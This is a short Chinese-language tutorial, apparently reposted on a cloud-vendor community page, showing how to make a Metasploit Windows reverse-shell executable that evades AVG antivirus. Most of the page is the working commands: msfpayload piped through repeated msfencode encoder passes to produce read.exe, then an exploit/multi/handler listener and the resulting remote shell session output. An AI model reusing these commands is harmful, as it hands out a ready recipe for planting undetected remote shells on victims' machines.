metasploit啟動遠程shell而不被殺毒軟體發現

來源:互聯網
上載者:User
root@bt:~# time msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o read.exe[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)[*] x86/shikata_ga_nai succeeded with size 368 (iteration=2)[*] x86/shikata_ga_nai succeeded with size 395 (iteration=3)[*] x86/shikata_ga_nai succeeded with size 422 (iteration=4)[*] x86/shikata_ga_nai succeeded with size 449 (iteration=5)[*] x86/alpha_upper succeeded with size 966 (iteration=1)[*] x86/alpha_upper succeeded with size 2000 (iteration=2)[*] x86/shikata_ga_nai succeeded with size 2029 (iteration=1)[*] x86/shikata_ga_nai succeeded with size 2058 (iteration=2)[*] x86/shikata_ga_nai succeeded with size 2087 (iteration=3)[*] x86/shikata_ga_nai succeeded with size 2116 (iteration=4)[*] x86/shikata_ga_nai succeeded with size 2145 (iteration=5)[*] x86/countdown succeeded with size 2163 (iteration=1)[*] x86/countdown succeeded with size 2181 (iteration=2)[*] x86/countdown succeeded with size 2199 (iteration=3)[*] x86/countdown succeeded with size 2217 (iteration=4)[*] x86/countdown succeeded with size 2235 (iteration=5)real    1m33.468suser    0m52.195ssys     0m39.830sroot@bt:~#


把read.exe上傳到XP,然後在cmd運行,殺毒軟體沒報告威脅:


Microsoft Windows XP [版本 5.1.2600](C) 著作權 1985-2001 Microsoft Corp.C:\Documents and Settings\Administrator>cd ..C:\Documents and Settings>cd ..C:\>read.exe


然後輸入命令:

root@bt:~# msfcli exploit/multi/handler PAYLOAD=windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 E[*] Please wait while we load the module tree...# cowsay++ ____________< metasploit > ------------       \   ,__,        \  (oo)____           (__)    )\              ||--|| *       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]+ -- --=[ 927 exploits - 499 auxiliary - 151 post+ -- --=[ 251 payloads - 28 encoders - 8 nopsPAYLOAD => windows/shell_reverse_tcpLHOST => 192.168.1.11LPORT => 31337[*] Started reverse handler on 192.168.1.11:31337 [*] Starting the payload handler...[*] Command shell session 1 opened (192.168.1.11:31337 -> 192.168.1.142:1181) at 2013-04-28 06:06:36 -0400Microsoft Windows XP [版本 5.1.2600](C) 著作權 1985-2001 Microsoft Corp.C:\>dirdir 磁碟機 C 中的卷沒有標籤。 卷的序號是 3052-FA52 C:\ 的目錄2012-03-24  11:55                 0 AUTOEXEC.BAT2013-04-28  16:06       131,820,480 avg_free_x86_all_2013.exe2012-03-24  11:55                 0 CONFIG.SYS2012-03-24  11:59    <DIR>          Documents and Settings2013-04-28  17:08    <DIR>          Program Files2013-04-29  22:17            73,802 read.exe2013-04-28  21:37                38 readme.txt2013-04-28  15:19    <DIR>          ruby2013-04-28  20:45    <DIR>          WINDOWS               5 個檔案    131,894,320 位元組               4 個目錄  5,329,256,448 可用位元組C:\>

這樣就開啟了一個遠端shell,並且沒有“驚動”avg這個殺毒軟體。

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.